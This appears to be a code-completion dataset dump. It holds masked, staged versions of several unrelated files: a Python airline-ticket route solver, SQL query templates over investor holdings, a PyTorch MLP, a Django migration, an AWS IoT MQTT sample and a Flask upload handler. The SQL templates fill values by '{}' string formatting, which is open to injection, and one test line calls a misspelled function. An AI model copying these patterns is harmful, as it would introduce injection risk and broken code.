"step-3": "<mask token>\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\nprint(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))\nprint(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',\n 'ICN'], ['ATL', 'SFO']]))\n",
"step-4": "from collections import defaultdict\n\n\ndef solution(tickets):\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n for r in routes:\n routes[r].sort(reverse=True)\n stack = ['ICN']\n path = []\n while stack:\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n else:\n path.append(stack.pop())\n return path[::-1]\n\n\nprint(soluiont([['ICN', 'BOO'], ['ICN', 'COO'], ['COO', 'ICN']]))\nprint(solution([['ICN', 'SFO'], ['ICN', 'ATL'], ['SFO', 'ATL'], ['ATL',\n 'ICN'], ['ATL', 'SFO']]))\n",
"step-5": "from collections import defaultdict\n\ndef solution(tickets):\n # 출발지가 키, 목적지가 value 인 딕셔너리 생성\n routes = defaultdict(list)\n for t in tickets:\n routes[t[0]].append(t[1])\n\n # 알파벳 빠른순으로 정렬해야함으로 reverse=True\n for r in routes:\n routes[r].sort(reverse=True)\n\n # 시작 위치 ICN\n stack = ['ICN']\n\n # 리턴 변수\n path = []\n\n while stack:\n # 현제 갈수 있는곳 찾기\n top = stack[-1]\n if top in routes and routes[top]:\n stack.append(routes[top].pop())\n\n # route 가 비지 않았는데 route[top]가 비어있다는것은 마지막 공항이라는 뜻\n else:\n path.append(stack.pop())\n\n\n # 마지막 공항을 찾기위해 path를 마지막에 역순 정렬렬\n return path[::-1]\n\n\nprint(soluiont([[\"ICN\",\"BOO\"],[\"ICN\",\"COO\"],[\"COO\",\"ICN\"]]))\nprint(solution([[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\",\"SFO\"]]))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
traditional_investor_stage1 = (
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND issuing_entities.name = '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO "
)
non_traditional_investor_stage1 = (
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO "
)
<|reserved_special_token_1|>
traditional_investor_stage1 = \
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date "\
"FROM "\
"(SELECT "\
"report_date, "\
"investor_holdings.investor_name AS investor,"\
"investor_id,"\
"AVG(investor_holdings.amount_held) AS invest_amount,"\
"AVG(investor_holdings.latest_change) AS invest_change,"\
"investor_holdings.security_id, "\
"MAX(isin) as isin,"\
"MAX(issue_date) as issue_date, "\
"MAX(maturity_date) as maturity_date "\
"FROM investor_holdings "\
"INNER JOIN securities ON investor_holdings.security_id = securities.id "\
"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id "\
"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id "\
"INNER JOIN gics ON organizations.sector = gics.sub_industry_id "\
"INNER JOIN security_issues ON security_issues.security_id = securities.id "\
"WHERE investor_holdings.deleted_at is NULL "\
"AND investor_holdings.report_date > '{}' "\
"AND issuing_entities.name = '{}' "\
"AND securities.currency = '{}' "\
"AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, " \
"investor_holdings.investor_id, " \
"investor_holdings.security_id, " \
"investor_holdings.report_date)) as FOO "
non_traditional_investor_stage1 = \
"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date "\
"FROM "\
"(SELECT "\
"report_date, "\
"investor_holdings.investor_name AS investor,"\
"investor_id,"\
"AVG(investor_holdings.amount_held) AS invest_amount,"\
"AVG(investor_holdings.latest_change) AS invest_change,"\
"investor_holdings.security_id, "\
"MAX(isin) as isin,"\
"MAX(issue_date) as issue_date, "\
"MAX(maturity_date) as maturity_date "\
"FROM investor_holdings "\
"INNER JOIN securities ON investor_holdings.security_id = securities.id "\
"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id "\
"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id "\
"INNER JOIN gics ON organizations.sector = gics.sub_industry_id "\
"INNER JOIN security_issues ON security_issues.security_id = securities.id "\
"WHERE investor_holdings.deleted_at is NULL "\
"AND investor_holdings.report_date > '{}' "\
"AND securities.currency = '{}' "\
"AND gics.industry_group = '{}' GROUP BY "\
"(investor_holdings.investor_name, " \
"investor_holdings.investor_id, " \
"investor_holdings.security_id, " \
"investor_holdings.report_date)) as FOO "
|
flexible
|
{
"blob_id": "1e168cf6ba785a08244f47eb490b54605a09e4b0",
"index": 9433,
"step-1": "<mask token>\n",
"step-2": "traditional_investor_stage1 = (\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND issuing_entities.name = '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO \"\n )\nnon_traditional_investor_stage1 = (\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date FROM (SELECT report_date, investor_holdings.investor_name AS investor,investor_id,AVG(investor_holdings.amount_held) AS invest_amount,AVG(investor_holdings.latest_change) AS invest_change,investor_holdings.security_id, MAX(isin) as isin,MAX(issue_date) as issue_date, MAX(maturity_date) as maturity_date FROM investor_holdings INNER JOIN securities ON investor_holdings.security_id = securities.id INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id INNER JOIN organizations ON issuing_entities.organization_id = organizations.id INNER JOIN gics ON organizations.sector = gics.sub_industry_id INNER JOIN security_issues ON 
security_issues.security_id = securities.id WHERE investor_holdings.deleted_at is NULL AND investor_holdings.report_date > '{}' AND securities.currency = '{}' AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, investor_holdings.investor_id, investor_holdings.security_id, investor_holdings.report_date)) as FOO \"\n )\n",
"step-3": "\n\ntraditional_investor_stage1 = \\\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date \"\\\n \"FROM \"\\\n \"(SELECT \"\\\n \"report_date, \"\\\n \"investor_holdings.investor_name AS investor,\"\\\n \"investor_id,\"\\\n \"AVG(investor_holdings.amount_held) AS invest_amount,\"\\\n \"AVG(investor_holdings.latest_change) AS invest_change,\"\\\n \"investor_holdings.security_id, \"\\\n \"MAX(isin) as isin,\"\\\n \"MAX(issue_date) as issue_date, \"\\\n \"MAX(maturity_date) as maturity_date \"\\\n \"FROM investor_holdings \"\\\n \"INNER JOIN securities ON investor_holdings.security_id = securities.id \"\\\n \"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id \"\\\n \"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id \"\\\n \"INNER JOIN gics ON organizations.sector = gics.sub_industry_id \"\\\n \"INNER JOIN security_issues ON security_issues.security_id = securities.id \"\\\n \"WHERE investor_holdings.deleted_at is NULL \"\\\n \"AND investor_holdings.report_date > '{}' \"\\\n \"AND issuing_entities.name = '{}' \"\\\n \"AND securities.currency = '{}' \"\\\n \"AND gics.industry_group = '{}' GROUP BY (investor_holdings.investor_name, \" \\\n \"investor_holdings.investor_id, \" \\\n \"investor_holdings.security_id, \" \\\n \"investor_holdings.report_date)) as FOO \"\n\n\nnon_traditional_investor_stage1 = \\\n \"SELECT investor, investor_id, invest_amount, invest_change, security_id, isin, issue_date, maturity_date \"\\\n \"FROM \"\\\n \"(SELECT \"\\\n \"report_date, \"\\\n \"investor_holdings.investor_name AS investor,\"\\\n \"investor_id,\"\\\n \"AVG(investor_holdings.amount_held) AS invest_amount,\"\\\n \"AVG(investor_holdings.latest_change) AS invest_change,\"\\\n \"investor_holdings.security_id, \"\\\n \"MAX(isin) as isin,\"\\\n \"MAX(issue_date) as issue_date, \"\\\n \"MAX(maturity_date) as maturity_date \"\\\n \"FROM investor_holdings 
\"\\\n \"INNER JOIN securities ON investor_holdings.security_id = securities.id \"\\\n \"INNER JOIN issuing_entities ON securities.issuing_entity_id = issuing_entities.id \"\\\n \"INNER JOIN organizations ON issuing_entities.organization_id = organizations.id \"\\\n \"INNER JOIN gics ON organizations.sector = gics.sub_industry_id \"\\\n \"INNER JOIN security_issues ON security_issues.security_id = securities.id \"\\\n \"WHERE investor_holdings.deleted_at is NULL \"\\\n \"AND investor_holdings.report_date > '{}' \"\\\n \"AND securities.currency = '{}' \"\\\n \"AND gics.industry_group = '{}' GROUP BY \"\\\n \"(investor_holdings.investor_name, \" \\\n \"investor_holdings.investor_id, \" \\\n \"investor_holdings.security_id, \" \\\n \"investor_holdings.report_date)) as FOO \"",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import torch
import torch.nn as nn
class MLPNet(nn.Module):
def __init__(self, num_classes):
super(MLPNet, self).__init__()
self.fc1 = nn.Linear(32 * 32 * 3, 512)
self.fc2 = nn.Linear(512, num_classes)
def forward(self, x):
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = torch.sigmoid(x)
x = self.fc2(x)
return x
def zero_weights(self):
self.fc1.weight.data.fill_(0.0)
self.fc1.bias.data.fill_(0.0)
self.fc2.weight.data.fill_(0.0)
self.fc2.bias.data.fill_(0.0)
|
normal
|
{
"blob_id": "eff8b6a282ac73a116587e7ed04f386927c9f826",
"index": 9089,
"step-1": "<mask token>\n\n\nclass MLPNet(nn.Module):\n <mask token>\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n\n def zero_weights(self):\n self.fc1.weight.data.fill_(0.0)\n self.fc1.bias.data.fill_(0.0)\n self.fc2.weight.data.fill_(0.0)\n self.fc2.bias.data.fill_(0.0)\n",
"step-4": "import torch\nimport torch.nn as nn\n\n\nclass MLPNet(nn.Module):\n\n def __init__(self, num_classes):\n super(MLPNet, self).__init__()\n self.fc1 = nn.Linear(32 * 32 * 3, 512)\n self.fc2 = nn.Linear(512, num_classes)\n\n def forward(self, x):\n x = x.view(x.size(0), -1)\n x = self.fc1(x)\n x = torch.sigmoid(x)\n x = self.fc2(x)\n return x\n\n def zero_weights(self):\n self.fc1.weight.data.fill_(0.0)\n self.fc1.bias.data.fill_(0.0)\n self.fc2.weight.data.fill_(0.0)\n self.fc2.bias.data.fill_(0.0)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
# Generated by Django 2.1.4 on 2019-01-11 11:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('devisa', '0021_auto_20190110_1256'),
]
operations = [
migrations.RemoveField(
model_name='entidade',
name='bairro',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cep',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cnes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_complemento',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_expedicao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_inicio_func',
),
migrations.RemoveField(
model_name='entidade',
name='ent_email',
),
migrations.RemoveField(
model_name='entidade',
name='ent_endereco',
),
migrations.RemoveField(
model_name='entidade',
name='ent_especializacao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fantasia',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fax',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fone',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_estadual',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_municipal',
),
migrations.RemoveField(
model_name='entidade',
name='ent_numero',
),
migrations.RemoveField(
model_name='entidade',
name='ent_obj_contrato_social',
),
migrations.RemoveField(
model_name='entidade',
name='ent_observacoes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_orgao_exp',
),
migrations.RemoveField(
model_name='entidade',
name='ent_pasta_num',
),
migrations.RemoveField(
model_name='entidade',
name='ent_registro_conselho',
),
migrations.RemoveField(
model_name='entidade',
name='ent_rg',
),
migrations.RemoveField(
model_name='entidade',
name='escolaridade',
),
migrations.RemoveField(
model_name='entidade',
name='formacao_profissional',
),
migrations.RemoveField(
model_name='entidade',
name='municipio',
),
migrations.RemoveField(
model_name='entidade',
name='natureza_juridica_dependencia',
),
]
|
normal
|
{
"blob_id": "34f79fa3de68b53f19220697815e5bae5270d056",
"index": 9274,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devisa', '0021_auto_20190110_1256')]\n operations = [migrations.RemoveField(model_name='entidade', name=\n 'bairro'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cep'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cnes'), migrations.RemoveField(model_name='entidade', name=\n 'ent_complemento'), migrations.RemoveField(model_name='entidade',\n name='ent_dt_expedicao'), migrations.RemoveField(model_name=\n 'entidade', name='ent_dt_inicio_func'), migrations.RemoveField(\n model_name='entidade', name='ent_email'), migrations.RemoveField(\n model_name='entidade', name='ent_endereco'), migrations.RemoveField\n (model_name='entidade', name='ent_especializacao'), migrations.\n RemoveField(model_name='entidade', name='ent_fantasia'), migrations\n .RemoveField(model_name='entidade', name='ent_fax'), migrations.\n RemoveField(model_name='entidade', name='ent_fone'), migrations.\n RemoveField(model_name='entidade', name='ent_insc_estadual'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_insc_municipal'), migrations.RemoveField(model_name='entidade',\n name='ent_numero'), migrations.RemoveField(model_name='entidade',\n name='ent_obj_contrato_social'), migrations.RemoveField(model_name=\n 'entidade', name='ent_observacoes'), migrations.RemoveField(\n model_name='entidade', name='ent_orgao_exp'), migrations.\n RemoveField(model_name='entidade', name='ent_pasta_num'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_registro_conselho'), migrations.RemoveField(model_name=\n 'entidade', name='ent_rg'), migrations.RemoveField(model_name=\n 'entidade', name='escolaridade'), migrations.RemoveField(model_name\n ='entidade', name='formacao_profissional'), migrations.RemoveField(\n model_name='entidade', name='municipio'), migrations.RemoveField(\n model_name='entidade', name='natureza_juridica_dependencia')]\n",
"step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devisa', '0021_auto_20190110_1256')]\n operations = [migrations.RemoveField(model_name='entidade', name=\n 'bairro'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cep'), migrations.RemoveField(model_name='entidade', name=\n 'ent_cnes'), migrations.RemoveField(model_name='entidade', name=\n 'ent_complemento'), migrations.RemoveField(model_name='entidade',\n name='ent_dt_expedicao'), migrations.RemoveField(model_name=\n 'entidade', name='ent_dt_inicio_func'), migrations.RemoveField(\n model_name='entidade', name='ent_email'), migrations.RemoveField(\n model_name='entidade', name='ent_endereco'), migrations.RemoveField\n (model_name='entidade', name='ent_especializacao'), migrations.\n RemoveField(model_name='entidade', name='ent_fantasia'), migrations\n .RemoveField(model_name='entidade', name='ent_fax'), migrations.\n RemoveField(model_name='entidade', name='ent_fone'), migrations.\n RemoveField(model_name='entidade', name='ent_insc_estadual'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_insc_municipal'), migrations.RemoveField(model_name='entidade',\n name='ent_numero'), migrations.RemoveField(model_name='entidade',\n name='ent_obj_contrato_social'), migrations.RemoveField(model_name=\n 'entidade', name='ent_observacoes'), migrations.RemoveField(\n model_name='entidade', name='ent_orgao_exp'), migrations.\n RemoveField(model_name='entidade', name='ent_pasta_num'),\n migrations.RemoveField(model_name='entidade', name=\n 'ent_registro_conselho'), migrations.RemoveField(model_name=\n 'entidade', name='ent_rg'), migrations.RemoveField(model_name=\n 'entidade', name='escolaridade'), migrations.RemoveField(model_name\n ='entidade', name='formacao_profissional'), migrations.RemoveField(\n model_name='entidade', name='municipio'), migrations.RemoveField(\n model_name='entidade', name='natureza_juridica_dependencia')]\n",
"step-5": "# Generated by Django 2.1.4 on 2019-01-11 11:58\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('devisa', '0021_auto_20190110_1256'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='entidade',\n name='bairro',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_cep',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_cnes',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_complemento',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_dt_expedicao',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_dt_inicio_func',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_email',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_endereco',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_especializacao',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fantasia',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fax',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_fone',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_insc_estadual',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_insc_municipal',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_numero',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_obj_contrato_social',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_observacoes',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_orgao_exp',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_pasta_num',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_registro_conselho',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='ent_rg',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='escolaridade',\n ),\n 
migrations.RemoveField(\n model_name='entidade',\n name='formacao_profissional',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='municipio',\n ),\n migrations.RemoveField(\n model_name='entidade',\n name='natureza_juridica_dependencia',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0.
from awscrt import http, io
from awsiot import mqtt_connection_builder
from utils.command_line_utils import CommandLineUtils
# This sample shows how to create a MQTT connection using a certificate file and key file.
# This sample is intended to be used as a reference for making MQTT connections.
# Callback when connection is accidentally lost.
def on_connection_interrupted(connection, error, **kwargs):
print("Connection interrupted. error: {}".format(error))
# Callback when an interrupted connection is re-established.
def on_connection_resumed(connection, return_code, session_present, **kwargs):
print("Connection resumed. return_code: {} session_present: {}".format(return_code, session_present))
if __name__ == '__main__':
io.init_logging(log_level=io.LogLevel.Trace, file_name="stderr")
# cmdData is the arguments/input from the command line placed into a single struct for
# use in this sample. This handles all of the command line parsing, validating, etc.
# See the Utils/CommandLineUtils for more information.
cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()
# Create the proxy options if the data is present in cmdData
proxy_options = None
if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:
proxy_options = http.HttpProxyOptions(
host_name=cmdData.input_proxy_host,
port=cmdData.input_proxy_port)
# Create a MQTT connection from the command line data
mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(
endpoint=cmdData.input_endpoint,
port=cmdData.input_port,
pkcs12_filepath=cmdData.input_pkcs12_file,
pkcs12_password=cmdData.input_pkcs12_password,
on_connection_interrupted=on_connection_interrupted,
on_connection_resumed=on_connection_resumed,
client_id=cmdData.input_clientId,
clean_session=False,
keep_alive_secs=30,
http_proxy_options=proxy_options)
if not cmdData.input_is_ci:
print(f"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...")
else:
print("Connecting to endpoint with client ID")
connect_future = mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
print("Connected!")
# Disconnect
print("Disconnecting...")
disconnect_future = mqtt_connection.disconnect()
disconnect_future.result()
print("Disconnected!")
|
normal
|
{
"blob_id": "2ff398e38b49d95fdc8a36a08eeb5950aaea1bc9",
"index": 2279,
"step-1": "<mask token>\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\nif __name__ == '__main__':\n io.init_logging(log_level=io.LogLevel.Trace, file_name='stderr')\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(host_name=cmdData.\n input_proxy_host, port=cmdData.input_proxy_port)\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(endpoint=\n cmdData.input_endpoint, port=cmdData.input_port, pkcs12_filepath=\n cmdData.input_pkcs12_file, pkcs12_password=cmdData.\n input_pkcs12_password, on_connection_interrupted=\n on_connection_interrupted, on_connection_resumed=\n on_connection_resumed, client_id=cmdData.input_clientId,\n clean_session=False, keep_alive_secs=30, http_proxy_options=\n proxy_options)\n if not cmdData.input_is_ci:\n print(\n f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\"\n )\n else:\n print('Connecting to endpoint with client ID')\n connect_future = mqtt_connection.connect()\n connect_future.result()\n print('Connected!')\n print('Disconnecting...')\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print('Disconnected!')\n",
"step-4": "from awscrt import http, io\nfrom awsiot import mqtt_connection_builder\nfrom utils.command_line_utils import CommandLineUtils\n\n\ndef on_connection_interrupted(connection, error, **kwargs):\n print('Connection interrupted. error: {}'.format(error))\n\n\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print('Connection resumed. return_code: {} session_present: {}'.format(\n return_code, session_present))\n\n\nif __name__ == '__main__':\n io.init_logging(log_level=io.LogLevel.Trace, file_name='stderr')\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(host_name=cmdData.\n input_proxy_host, port=cmdData.input_proxy_port)\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(endpoint=\n cmdData.input_endpoint, port=cmdData.input_port, pkcs12_filepath=\n cmdData.input_pkcs12_file, pkcs12_password=cmdData.\n input_pkcs12_password, on_connection_interrupted=\n on_connection_interrupted, on_connection_resumed=\n on_connection_resumed, client_id=cmdData.input_clientId,\n clean_session=False, keep_alive_secs=30, http_proxy_options=\n proxy_options)\n if not cmdData.input_is_ci:\n print(\n f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\"\n )\n else:\n print('Connecting to endpoint with client ID')\n connect_future = mqtt_connection.connect()\n connect_future.result()\n print('Connected!')\n print('Disconnecting...')\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print('Disconnected!')\n",
"step-5": "# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0.\n\nfrom awscrt import http, io\nfrom awsiot import mqtt_connection_builder\nfrom utils.command_line_utils import CommandLineUtils\n\n# This sample shows how to create a MQTT connection using a certificate file and key file.\n# This sample is intended to be used as a reference for making MQTT connections.\n\n# Callback when connection is accidentally lost.\ndef on_connection_interrupted(connection, error, **kwargs):\n print(\"Connection interrupted. error: {}\".format(error))\n\n# Callback when an interrupted connection is re-established.\ndef on_connection_resumed(connection, return_code, session_present, **kwargs):\n print(\"Connection resumed. return_code: {} session_present: {}\".format(return_code, session_present))\n\n\nif __name__ == '__main__':\n\n io.init_logging(log_level=io.LogLevel.Trace, file_name=\"stderr\")\n\n # cmdData is the arguments/input from the command line placed into a single struct for\n # use in this sample. 
This handles all of the command line parsing, validating, etc.\n # See the Utils/CommandLineUtils for more information.\n cmdData = CommandLineUtils.parse_sample_input_pkcs12_connect()\n\n # Create the proxy options if the data is present in cmdData\n proxy_options = None\n if cmdData.input_proxy_host is not None and cmdData.input_proxy_port != 0:\n proxy_options = http.HttpProxyOptions(\n host_name=cmdData.input_proxy_host,\n port=cmdData.input_proxy_port)\n\n # Create a MQTT connection from the command line data\n mqtt_connection = mqtt_connection_builder.mtls_with_pkcs12(\n endpoint=cmdData.input_endpoint,\n port=cmdData.input_port,\n pkcs12_filepath=cmdData.input_pkcs12_file,\n pkcs12_password=cmdData.input_pkcs12_password,\n on_connection_interrupted=on_connection_interrupted,\n on_connection_resumed=on_connection_resumed,\n client_id=cmdData.input_clientId,\n clean_session=False,\n keep_alive_secs=30,\n http_proxy_options=proxy_options)\n\n if not cmdData.input_is_ci:\n print(f\"Connecting to {cmdData.input_endpoint} with client ID '{cmdData.input_clientId}'...\")\n else:\n print(\"Connecting to endpoint with client ID\")\n\n connect_future = mqtt_connection.connect()\n # Future.result() waits until a result is available\n connect_future.result()\n print(\"Connected!\")\n\n # Disconnect\n print(\"Disconnecting...\")\n disconnect_future = mqtt_connection.disconnect()\n disconnect_future.result()\n print(\"Disconnected!\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@app.route('/')
def hello():
return 'Hello word'
@app.route('/analyze', methods=['POST'])
def analyze():
if request.method == 'POST':
image_file = request.files['image']
file_name = secure_filename(image_file.filename)
image_file.save(os.path.join(app.config['UPLOAD_FOLDER'], file_name))
print(f'{UPLOAD_FOLDER}/{file_name}', os.path.join(app.config[
'UPLOAD_FOLDER']))
binarization = Binarizacion(f'./public/files/{file_name}')
binarization.binaryImage()
binarization.otsuImage()
